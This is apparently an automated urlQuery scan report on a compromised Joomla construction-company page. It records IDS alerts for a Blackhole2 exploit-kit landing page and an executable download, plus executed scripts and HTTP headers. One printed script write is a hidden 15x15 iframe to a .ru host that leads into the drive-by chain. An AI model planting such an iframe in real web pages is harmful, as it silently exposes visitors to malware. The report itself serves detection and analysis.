Overview

URLhttp://www.linaconstruction.net/index.php?option=com_aicontactsafe
IP74.208.249.237
ASNAS8560 1&1 Internet AG
Location United States
Report completed2012-11-06 17:45:25 CET
StatusLoading report..
urlQuery Alerts Detected a Dynamic DNS URL
Detected SutraTDS URL pattern


Settings

UserAgentMozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Referer
Adobe Reader8.0
Java1.6.0_26


Intrusion Detection Systems

Suricata /w Emerging Threats Pro
Timestamp Source IP Destination IP Severity Alert
2012-11-06 17:44:17 91.229.210.155 urlQuery Client1ET CURRENT_EVENTS DRIVEBY Blackhole2 - Landing Page Received
2012-11-06 17:44:29 91.229.210.155 urlQuery Client3FILEMAGIC Zip archive data
2012-11-06 17:44:34 urlQuery Client 91.229.210.1551ET CURRENT_EVENTS Unknown_s=1 - Payload Requested - 32AlphaNum?s=1 Java Request
2012-11-06 17:44:34 91.229.210.155 urlQuery Client3FILEMAGIC windows executable
2012-11-06 17:44:43 173.194.69.95 urlQuery Client3FILEMAGIC Macromedia Flash data (compressed),
Snort /w Sourcefire VRT
Timestamp Source IP Destination IP Severity Alert
2012-11-06 17:44:34 91.229.210.155 urlQuery Client3FILE-IDENTIFY Portable Executable binary file magic detected


Recent reports on same IP/ASN/Domain

Last 6 reports on IP: 74.208.249.237

Date Alerts / IDS URL IP
2012-11-12 13:19:411 / 0http://www.linaconstruction.net/index.php?option=com_content74.208.249.237
2012-11-12 13:19:351 / 0http://www.linaconstruction.net/index.php?option=com_aicontactsafe74.208.249.237
2012-11-12 00:09:201 / 0http://www.linaconstruction.net/index.php?option=com_aicontactsafe74.208.249.237
2012-11-12 00:09:191 / 0http://www.linaconstruction.net/index.php?option=com_content74.208.249.237
2012-11-11 09:29:341 / 0http://www.linaconstruction.net/index.php?option=com_content74.208.249.237
2012-11-11 09:29:121 / 0http://www.linaconstruction.net/index.php?option=com_aicontactsafe74.208.249.237

Last 6 reports on ASN: AS8560 1&1 Internet AG

Date Alerts / IDS URL IP
2013-02-20 02:22:261 / 23http://www.cdifacilities.co.uk/wp-content/plugins/tell-a-friend/track.php?pprec87.106.156.147
2013-02-20 02:22:161 / 22http://www.kaenyamalounge.com/wp-content/plugins/track.php?pprec74.208.93.44
2013-02-20 02:22:141 / 10http://www.taginstitute.org/wp-content/plugins/tell-a-friend/track.php?pprec87.106.158.194
2013-02-20 02:22:111 / 23http://www.creativewake.com/wp-content/plugins/tell-a-friend/track.php?pprec74.208.84.122
2013-02-20 02:22:001 / 22http://www.newentdentalcare.co.uk/wp-content/plugins/tell-a-friend/track.php?pprec87.106.156.147
2013-02-20 02:20:400 / 15http://www.giraldawebdesign.com/217.160.225.39

Last 6 reports on domain: www.linaconstruction.net

Date Alerts / IDS URL IP
2012-11-12 13:19:411 / 0http://www.linaconstruction.net/index.php?option=com_content74.208.249.237
2012-11-12 13:19:351 / 0http://www.linaconstruction.net/index.php?option=com_aicontactsafe74.208.249.237
2012-11-12 00:09:201 / 0http://www.linaconstruction.net/index.php?option=com_aicontactsafe74.208.249.237
2012-11-12 00:09:191 / 0http://www.linaconstruction.net/index.php?option=com_content74.208.249.237
2012-11-11 09:29:341 / 0http://www.linaconstruction.net/index.php?option=com_content74.208.249.237
2012-11-11 09:29:121 / 0http://www.linaconstruction.net/index.php?option=com_aicontactsafe74.208.249.237



JavaScript

Executed Scripts (137)


Executed Evals (1)

#1 JavaScript::Eval (size: 3561, repeated: 8)

jQuery.easing['jswing'] = jQuery.easing['swing'];
jQuery.extend(jQuery.easing, {
    def: 'easeOutQuad',
    swing: function(x, t, b, c, d) {
        return jQuery.easing[jQuery.easing.def](x, t, b, c, d)
    },
    easeInQuad: function(x, t, b, c, d) {
        return c * (t /= d) * t + b
    },
    easeOutQuad: function(x, t, b, c, d) {
        return -c * (t /= d) * (t - 2) + b
    },
    easeInOutQuad: function(x, t, b, c, d) {
        if ((t /= d / 2) < 1) return c / 2 * t * t + b;
        return -c / 2 * ((--t) * (t - 2) - 1) + b
    },
    easeInCubic: function(x, t, b, c, d) {
        return c * (t /= d) * t * t + b
    },
    easeOutCubic: function(x, t, b, c, d) {
        return c * ((t = t / d - 1) * t * t + 1) + b
    },
    easeInOutCubic: function(x, t, b, c, d) {
        if ((t /= d / 2) < 1) return c / 2 * t * t * t + b;
        return c / 2 * ((t -= 2) * t * t + 2) + b
    },
    easeInQuart: function(x, t, b, c, d) {
        return c * (t /= d) * t * t * t + b
    },
    easeOutQuart: function(x, t, b, c, d) {
        return -c * ((t = t / d - 1) * t * t * t - 1) + b
    },
    easeInOutQuart: function(x, t, b, c, d) {
        if ((t /= d / 2) < 1) return c / 2 * t * t * t * t + b;
        return -c / 2 * ((t -= 2) * t * t * t - 2) + b
    },
    easeInQuint: function(x, t, b, c, d) {
        return c * (t /= d) * t * t * t * t + b
    },
    easeOutQuint: function(x, t, b, c, d) {
        return c * ((t = t / d - 1) * t * t * t * t + 1) + b
    },
    easeInOutQuint: function(x, t, b, c, d) {
        if ((t /= d / 2) < 1) return c / 2 * t * t * t * t * t + b;
        return c / 2 * ((t -= 2) * t * t * t * t + 2) + b
    },
    easeInSine: function(x, t, b, c, d) {
        return -c * Math.cos(t / d * (Math.PI / 2)) + c + b
    },
    easeOutSine: function(x, t, b, c, d) {
        return c * Math.sin(t / d * (Math.PI / 2)) + b
    },
    easeInOutSine: function(x, t, b, c, d) {
        return -c / 2 * (Math.cos(Math.PI * t / d) - 1) + b
    },
    easeInExpo: function(x, t, b, c, d) {
        return (t == 0) ? b : c * Math.pow(2, 10 * (t / d - 1)) + b
    },
    easeOutExpo: function(x, t, b, c, d) {
        return (t == d) ? b + c : c * (-Math.pow(2, -10 * t / d) + 1) + b
    },
    easeInOutExpo: function(x, t, b, c, d) {
        if (t == 0) return b;
        if (t == d) return b + c;
        if ((t /= d / 2) < 1) return c / 2 * Math.pow(2, 10 * (t - 1)) + b;
        return c / 2 * (-Math.pow(2, -10 * --t) + 2) + b
    },
    easeInCirc: function(x, t, b, c, d) {
        return -c * (Math.sqrt(1 - (t /= d) * t) - 1) + b
    },
    easeOutCirc: function(x, t, b, c, d) {
        return c * Math.sqrt(1 - (t = t / d - 1) * t) + b
    },
    easeInOutCirc: function(x, t, b, c, d) {
        if ((t /= d / 2) < 1) return -c / 2 * (Math.sqrt(1 - t * t) - 1) + b;
        return c / 2 * (Math.sqrt(1 - (t -= 2) * t) + 1) + b
    },
    easeInElastic: function(x, t, b, c, d) {
        var s = 1.70158;
        var p = 0;
        var a = c;
        if (t == 0) return b;
        if ((t /= d) == 1) return b + c;
        if (!p) p = d * .3;
        if (a < Math.abs(c)) {
            a = c;
            var s = p / 4
        } else var s = p / (2 * Math.PI) * Math.asin(c / a);
        return -(a * Math.pow(2, 10 * (t -= 1)) * Math.sin((t * d - s) * (2 * Math.PI) / p)) + b
    },
    easeOutElastic: function(x, t, b, c, d) {
        var s = 1.70158;
        var p = 0;
        var a = c;
        if (t == 0) return b;
        if ((t /= d) == 1) return b + c;
        if (!p) p = d * .3;
        if (a < Math.abs(c)) {
            a = c;
            var s = p / 4
        } else var s = p / (2 * Math.PI) * Math.asin(c / a);
        return a * Math.pow(2, -10 * t) * Math.sin((t * d - s) * (2 * Math.PI) / p) + c + b
    },
    easeInOutElastic: function(x, t, b, c, d) {
        var s = 1.70158;
        var p = 0;
        var a = c;
        if (t == 0) return b;
        if ((t /= d / 2) == 2) return b + c;
        if (!p) p = d * (.3 * 1.5);
        if (a < Math.abs(c)) {
            a = c;
            var s = p / 4
        } else var s = p / (2 * Math.PI) * Math.asin(c / a);
        if (t < 1) return -.5 * (a * Math.pow(2, 10 * (t -= 1)) * Math.sin((t * d - s) * (2 * Math.PI) / p)) + b;
        return a * Math.pow(2, -10 * (t -= 1)) * Math.sin((t * d - s) * (2 * Math.PI) / p) * .5 + c + b
    },
    easeInBack: function(x, t, b, c, d, s) {
        if (s == undefined) s = 1.70158;
        return c * (t /= d) * t * ((s + 1) * t - s) + b
    },
    easeOutBack: function(x, t, b, c, d, s) {
        if (s == undefined) s = 1.70158;
        return c * ((t = t / d - 1) * t * ((s + 1) * t + s) + 1) + b
    },
    easeInOutBack: function(x, t, b, c, d, s) {
        if (s == undefined) s = 1.70158;
        if ((t /= d / 2) < 1) return c / 2 * (t * t * (((s *= (1.525)) + 1) * t - s)) + b;
        return c / 2 * ((t -= 2) * t * (((s *= (1.525)) + 1) * t + s) + 2) + b
    },
    easeInBounce: function(x, t, b, c, d) {
        return c - jQuery.easing.easeOutBounce(x, d - t, 0, c, d) + b
    },
    easeOutBounce: function(x, t, b, c, d) {
        if ((t /= d) < (1 / 2.75)) {
            return c * (7.5625 * t * t) + b
        } else if (t < (2 / 2.75)) {
            return c * (7.5625 * (t -= (1.5 / 2.75)) * t + .75) + b
        } else if (t < (2.5 / 2.75)) {
            return c * (7.5625 * (t -= (2.25 / 2.75)) * t + .9375) + b
        } else {
            return c * (7.5625 * (t -= (2.625 / 2.75)) * t + .984375) + b
        }
    },
    easeInOutBounce: function(x, t, b, c, d) {
        if (t < d / 2) return jQuery.easing.easeInBounce(x, t * 2, 0, c, d) * .5 + b;
        return jQuery.easing.easeOutBounce(x, t * 2 - d, 0, c, d) * .5 + c * .5 + b
    }
});

Executed Writes (44)

#1 JavaScript::Write (size: 148, repeated: 5)

<iframe src="http://disappointingtheproduct.ru/auxiliaryxga.cgi?8" scrolling="auto" frameborder="no" align="center" height="15" width="15"></iframe>

#2 JavaScript::Write (size: 198, repeated: 3)

<iframe src="http://view.atdmt.com/iaction/adoapn_AppNexusDemoActionTag_1" width="1" height="1" frameborder="0" scrolling="No" marginheight="0" marginwidth="0" topmargin="0" leftmargin="0"></iframe>

#3 JavaScript::Write (size: 139, repeated: 2)

<img src="http://ad.yieldmanager.com/cms/v1?esig=1~17e68b1b86afcfd8436104fe567484ccc2161b0f&nwid=10000602235&sigv=1" width="1" height="1"/>

#4 JavaScript::Write (size: 71, repeated: 1)

<img src="http://cm.ac3.msn.com/CACMSH.ashx?t=1" width="1" height="1"/>

#5 JavaScript::Write (size: 72, repeated: 4)

<script src="http://cdn.echoenabled.com/clientapps/v2/auth.js"></script>

#6 JavaScript::Write (size: 77, repeated: 4)

<script src="http://cdn.echoenabled.com/clientapps/v2/backplane.js"></script>

#7 JavaScript::Write (size: 75, repeated: 4)

<script src="http://cdn.echoenabled.com/clientapps/v2/counter.js"></script>

#8 JavaScript::Write (size: 76, repeated: 4)

<script src="http://cdn.echoenabled.com/clientapps/v2/curation.js"></script>

#9 JavaScript::Write (size: 90, repeated: 4)

<script src="http://cdn.echoenabled.com/clientapps/v2/plugins/community-flag.js"></script>

#10 JavaScript::Write (size: 84, repeated: 4)

<script src="http://cdn.echoenabled.com/clientapps/v2/plugins/curation.js"></script>

#11 JavaScript::Write (size: 85, repeated: 4)

<script src="http://cdn.echoenabled.com/clientapps/v2/plugins/form-auth.js"></script>

#12 JavaScript::Write (size: 80, repeated: 4)

<script src="http://cdn.echoenabled.com/clientapps/v2/plugins/like.js"></script>

#13 JavaScript::Write (size: 92, repeated: 4)

<script src="http://cdn.echoenabled.com/clientapps/v2/plugins/metadata-manager.js"></script>

#14 JavaScript::Write (size: 81, repeated: 4)

<script src="http://cdn.echoenabled.com/clientapps/v2/plugins/reply.js"></script>

#15 JavaScript::Write (size: 84, repeated: 4)

<script src="http://cdn.echoenabled.com/clientapps/v2/plugins/user-ban.js"></script>

#16 JavaScript::Write (size: 91, repeated: 4)

<script src="http://cdn.echoenabled.com/clientapps/v2/plugins/user-privileges.js"></script>

#17 JavaScript::Write (size: 74, repeated: 4)

<script src="http://cdn.echoenabled.com/clientapps/v2/stream.js"></script>

#18 JavaScript::Write (size: 74, repeated: 4)

<script src="http://cdn.echoenabled.com/clientapps/v2/submit.js"></script>

#19 JavaScript::Write (size: 77, repeated: 4)

<script src="http://cdn.echoenabled.com/clientapps/v2/user-list.js"></script>

#20 JavaScript::Write (size: 89, repeated: 4)

<script src="http://cdn.realtidbits.com/libs/v1/CustomReorder/CustomReorder.js"></script>

#21 JavaScript::Write (size: 93, repeated: 4)

<script src="http://cdn.realtidbits.com/libs/v1/EMBSubscription/EMBSubscription.js"></script>

#22 JavaScript::Write (size: 81, repeated: 4)

<script src="http://cdn.realtidbits.com/libs/v1/HoverCard/HoverCard.js"></script>

#23 JavaScript::Write (size: 83, repeated: 4)

<script src="http://cdn.realtidbits.com/libs/v1/UpdateSort/UpdateSort.js"></script>

#24 JavaScript::Write (size: 84, repeated: 4)

<script src="http://cdn.realtidbits.com/libs/v1/UpdateSort/UpdateSort2.js"></script>

#25 JavaScript::Write (size: 81, repeated: 4)

<script src="http://cdn.realtidbits.com/libs/v1/analytics/analytics.js"></script>

#26 JavaScript::Write (size: 77, repeated: 4)

<script src="http://cdn.realtidbits.com/libs/v1/forum/bumptopic.js"></script>

#27 JavaScript::Write (size: 72, repeated: 4)

<script src="http://cdn.realtidbits.com/libs/v1/forum/core.js"></script>

#28 JavaScript::Write (size: 72, repeated: 4)

<script src="http://cdn.realtidbits.com/libs/v1/forum/edit.js"></script>

#29 JavaScript::Write (size: 94, repeated: 4)

<script src="http://cdn.realtidbits.com/libs/v1/forum/jquery-ui-1.8.8.custom.min.js"></script>

#30 JavaScript::Write (size: 92, repeated: 4)

<script src="http://cdn.realtidbits.com/libs/v1/forum/jquery.ba-hashchange.min.js"></script>

#31 JavaScript::Write (size: 83, repeated: 4)

<script src="http://cdn.realtidbits.com/libs/v1/forum/localization/en.js"></script>

#32 JavaScript::Write (size: 73, repeated: 4)

<script src="http://cdn.realtidbits.com/libs/v1/jquery-pack.js"></script>

#33 JavaScript::Write (size: 69, repeated: 4)

<script src="http://cdn.realtidbits.com/libs/v1/lscache.js"></script>

#34 JavaScript::Write (size: 89, repeated: 4)

<script src="http://cdn.realtidbits.com/libs/v1/notifications/notifications.js"></script>

#35 JavaScript::Write (size: 77, repeated: 8)

<script src="http://cdn.realtidbits.com/libs/v1/rssfeed/rssfeed.js"></script>

#36 JavaScript::Write (size: 73, repeated: 4)

<script src="http://cdn.realtidbits.com/libs/v1/sonar.polls.js"></script>

#37 JavaScript::Write (size: 89, repeated: 4)

<script src="http://cdn.realtidbits.com/libs/v1/trendingposts/trendingposts.js"></script>

#38 JavaScript::Write (size: 69, repeated: 4)

<script src="http://cdn.realtidbits.com/libs/v1/ugcpoll.js"></script>

#39 JavaScript::Write (size: 110, repeated: 4)

<script src='http://ajax.googleapis.com/ajax/libs/jquery/1.6.2/jquery.min.js' type='text/javascript'></script>

#40 JavaScript::Write (size: 492, repeated: 4)

<script src='http://reg.sso.universalmusic.com/scripts/capture.js?host=http%3A%2F%2Fwww.ladygaga.com&clientId=9etp92vwb5b6rkyhc3zana8fk54k7nqv&bundle=CrOlwx%2bTAhN6Ip%2bS8MfO7Ie0MMj45MGKonhiugcGfE5EZo7lvSJluZ7ikFzyd3IqM9omoWorzggEpY71dRjW9PnoTTMmZsBijX%2f%2fxpu%2bGdOH%2b8v6y84EwdY2F%2frzLHBzsPqCwyU15%2b24VylPYeWYj%2b%2fohSMT9BeTif7RpjRhN%2fTUDKOjSin%2bMc80hjSFtEQoPGp4eDG75BI2xduY52%2fXbTq%2buT0Z4RHpBcqsJWnfPo%2bS1Xu1u2NovCR5VffczODO&thinRegistration=true' type='text/javascript'></script>

#41 JavaScript::Write (size: 135, repeated: 4)

<script type="text/javascript" src="http://www.ladygaga.com/aspnet_client/microgroove/shadowbox/adapters/shadowbox-jquery.js"></script>

#42 JavaScript::Write (size: 132, repeated: 4)

<script type="text/javascript" src="http://www.ladygaga.com/aspnet_client/microgroove/shadowbox/languages/shadowbox-en.js"></script>

#43 JavaScript::Write (size: 134, repeated: 4)

<script type="text/javascript" src="http://www.ladygaga.com/aspnet_client/microgroove/shadowbox/players/shadowbox-iframe.js"></script>

#44 JavaScript::Write (size: 131, repeated: 4)

<script type="text/javascript" src="http://www.ladygaga.com/aspnet_client/microgroove/shadowbox/players/shadowbox-img.js"></script>


HTTP Transactions (249)


Request Response
GET /templates/gk_gomuproject/favicon.ico HTTP/1.1

Host: www.linaconstruction.net

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Cookie: ed82ac3b32503d9be39aedc137a440f1=91ff40bb827117e82556a1cabcb4eee7
HTTP/1.1 403 Forbidden

Content-Type: text/html; charset=iso-8859-1
Date: Tue, 06 Nov 2012 16:44:16 GMT
Server: Apache
Content-Length: 357
Keep-Alive: timeout=2, max=200
Connection: Keep-Alive
GET /plugins/system/jceutilities/css/jceutilities.css?v=224 HTTP/1.1

Host: www.linaconstruction.net

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.linaconstruction.net/index.php?option=com_aicontactsafe
Cookie: ed82ac3b32503d9be39aedc137a440f1=91ff40bb827117e82556a1cabcb4eee7
HTTP/1.1 200 OK

Content-Type: text/css
Date: Tue, 06 Nov 2012 16:44:16 GMT
Server: Apache
Last-Modified: Mon, 09 May 2011 06:16:29 GMT
Etag: &quot;80b6ec19-8ff-4a2d1c7b46bba&quot;
Accept-Ranges: bytes
Content-Length: 2303
Keep-Alive: timeout=2, max=200
Connection: Keep-Alive
GET /components/com_rsform/assets/css/front.css HTTP/1.1

Host: www.linaconstruction.net

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.linaconstruction.net/index.php?option=com_aicontactsafe
Cookie: ed82ac3b32503d9be39aedc137a440f1=91ff40bb827117e82556a1cabcb4eee7
HTTP/1.1 200 OK

Content-Type: text/css
Date: Tue, 06 Nov 2012 16:44:16 GMT
Server: Apache
Last-Modified: Thu, 04 Aug 2011 00:00:44 GMT
Etag: &quot;145c9d-3da-4a9a2ac1f38c4&quot;
Accept-Ranges: bytes
Content-Length: 986
Keep-Alive: timeout=2, max=200
Connection: Keep-Alive
GET /plugins/system/jceutilities/themes/standard/css/style.css?version=224 HTTP/1.1

Host: www.linaconstruction.net

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.linaconstruction.net/index.php?option=com_aicontactsafe
Cookie: ed82ac3b32503d9be39aedc137a440f1=91ff40bb827117e82556a1cabcb4eee7
HTTP/1.1 200 OK

Content-Type: text/css
Date: Tue, 06 Nov 2012 16:44:16 GMT
Server: Apache
Last-Modified: Mon, 09 May 2011 06:16:29 GMT
Etag: &quot;80b6ff50-65a-4a2d1c7b48afa&quot;
Accept-Ranges: bytes
Content-Length: 1626
Keep-Alive: timeout=2, max=199
Connection: Keep-Alive
GET /components/com_rsform/assets/calendar/calendar.css HTTP/1.1

Host: www.linaconstruction.net

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.linaconstruction.net/index.php?option=com_aicontactsafe
Cookie: ed82ac3b32503d9be39aedc137a440f1=91ff40bb827117e82556a1cabcb4eee7
HTTP/1.1 200 OK

Content-Type: text/css
Date: Tue, 06 Nov 2012 16:44:16 GMT
Server: Apache
Last-Modified: Thu, 04 Aug 2011 00:00:44 GMT
Etag: &quot;800e7b8c-1514-4a9a2ac1f38c4&quot;
Accept-Ranges: bytes
Content-Length: 5396
Keep-Alive: timeout=2, max=200
Connection: Keep-Alive
GET /media/system/css/calendar-jos.css HTTP/1.1

Host: www.linaconstruction.net

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.linaconstruction.net/index.php?option=com_aicontactsafe
Cookie: ed82ac3b32503d9be39aedc137a440f1=91ff40bb827117e82556a1cabcb4eee7
HTTP/1.1 200 OK

Content-Type: text/css
Date: Tue, 06 Nov 2012 16:44:16 GMT
Server: Apache
Last-Modified: Wed, 03 Jun 2009 04:46:22 GMT
Etag: &quot;8223e870-f59-46b6a5749c380&quot;
Accept-Ranges: bytes
Content-Length: 3929
Keep-Alive: timeout=2, max=199
Connection: Keep-Alive
GET /templates/gk_gomuproject/css/ouerteam_css.css HTTP/1.1

Host: www.linaconstruction.net

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.linaconstruction.net/index.php?option=com_aicontactsafe
Cookie: ed82ac3b32503d9be39aedc137a440f1=91ff40bb827117e82556a1cabcb4eee7
HTTP/1.1 200 OK

Content-Type: text/css
Date: Tue, 06 Nov 2012 16:44:16 GMT
Server: Apache
Last-Modified: Wed, 16 Nov 2011 03:56:00 GMT
Etag: &quot;870736cd-1bbc-4b1d214fd7d8d&quot;
Accept-Ranges: bytes
Content-Length: 7100
Keep-Alive: timeout=2, max=200
Connection: Keep-Alive
GET /components/com_aicontactsafe/includes/css/aicontactsafe_general.css HTTP/1.1

Host: www.linaconstruction.net

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.linaconstruction.net/index.php?option=com_aicontactsafe
Cookie: ed82ac3b32503d9be39aedc137a440f1=91ff40bb827117e82556a1cabcb4eee7
HTTP/1.1 200 OK

Content-Type: text/css
Date: Tue, 06 Nov 2012 16:44:16 GMT
Server: Apache
Last-Modified: Mon, 09 May 2011 06:17:05 GMT
Etag: &quot;cdf5e-1e3-4a2d1c9dae71a&quot;
Accept-Ranges: bytes
Content-Length: 483
Keep-Alive: timeout=2, max=199
Connection: Keep-Alive
GET /media/aicontactsafe/cssprofiles/profile_css_1.css HTTP/1.1

Host: www.linaconstruction.net

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.linaconstruction.net/index.php?option=com_aicontactsafe
Cookie: ed82ac3b32503d9be39aedc137a440f1=91ff40bb827117e82556a1cabcb4eee7
HTTP/1.1 200 OK

Content-Type: text/css
Date: Tue, 06 Nov 2012 16:44:16 GMT
Server: Apache
Last-Modified: Mon, 09 May 2011 06:17:05 GMT
Etag: &quot;822599f3-11cb-4a2d1c9e16f1c&quot;
Accept-Ranges: bytes
Content-Length: 4555
Keep-Alive: timeout=2, max=198
Connection: Keep-Alive
GET /media/system/js/mootools.js HTTP/1.1

Host: www.linaconstruction.net

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.linaconstruction.net/index.php?option=com_aicontactsafe
Cookie: ed82ac3b32503d9be39aedc137a440f1=91ff40bb827117e82556a1cabcb4eee7
HTTP/1.1 403 Forbidden

Content-Type: text/html; charset=iso-8859-1
Date: Tue, 06 Nov 2012 16:44:16 GMT
Server: Apache
Content-Length: 348
Keep-Alive: timeout=2, max=199
Connection: Keep-Alive
GET /plugins/system/jceutilities/js/mediaobject.js?v=224 HTTP/1.1

Host: www.linaconstruction.net

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.linaconstruction.net/index.php?option=com_aicontactsafe
Cookie: ed82ac3b32503d9be39aedc137a440f1=91ff40bb827117e82556a1cabcb4eee7
HTTP/1.1 200 OK

Content-Type: application/x-javascript
Date: Tue, 06 Nov 2012 16:44:16 GMT
Server: Apache
Last-Modified: Tue, 06 Nov 2012 16:39:23 GMT
Etag: &quot;80b6ec22-fc5-4cdd63e92412c&quot;
Accept-Ranges: bytes
Content-Length: 4037
Keep-Alive: timeout=2, max=198
Connection: Keep-Alive
GET /media/system/js/calendar-setup.js HTTP/1.1

Host: www.linaconstruction.net

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.linaconstruction.net/index.php?option=com_aicontactsafe
Cookie: ed82ac3b32503d9be39aedc137a440f1=91ff40bb827117e82556a1cabcb4eee7
HTTP/1.1 200 OK

Content-Type: application/x-javascript
Date: Tue, 06 Nov 2012 16:44:16 GMT
Server: Apache
Last-Modified: Tue, 06 Nov 2012 16:39:19 GMT
Etag: &quot;8223e893-13de-4cdd63e5e00f7&quot;
Accept-Ranges: bytes
Content-Length: 5086
Keep-Alive: timeout=2, max=198
Connection: Keep-Alive
GET /index.php?option=com_aicontactsafe HTTP/1.1

Host: www.linaconstruction.net

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
HTTP/1.1 200 OK

Content-Type: text/html; charset=utf-8
Date: Tue, 06 Nov 2012 16:44:15 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
P3P: CP=&quot;NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM&quot;
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: ed82ac3b32503d9be39aedc137a440f1=91ff40bb827117e82556a1cabcb4eee7; path=/
Last-Modified: Tue, 06 Nov 2012 16:44:15 GMT
Keep-Alive: timeout=2, max=200
Connection: Keep-Alive
Transfer-Encoding: chunked
GET /templates/system/css/system.css HTTP/1.1

Host: www.linaconstruction.net

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.linaconstruction.net/index.php?option=com_aicontactsafe
Cookie: ed82ac3b32503d9be39aedc137a440f1=91ff40bb827117e82556a1cabcb4eee7
HTTP/1.1 200 OK

Content-Type: text/css
Date: Tue, 06 Nov 2012 16:44:16 GMT
Server: Apache
Last-Modified: Sun, 14 Jun 2009 18:35:02 GMT
Etag: &quot;83227d91-569-46c533315e180&quot;
Accept-Ranges: bytes
Content-Length: 1385
Keep-Alive: timeout=2, max=197
Connection: Keep-Alive
GET /templates/system/css/general.css HTTP/1.1

Host: www.linaconstruction.net

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
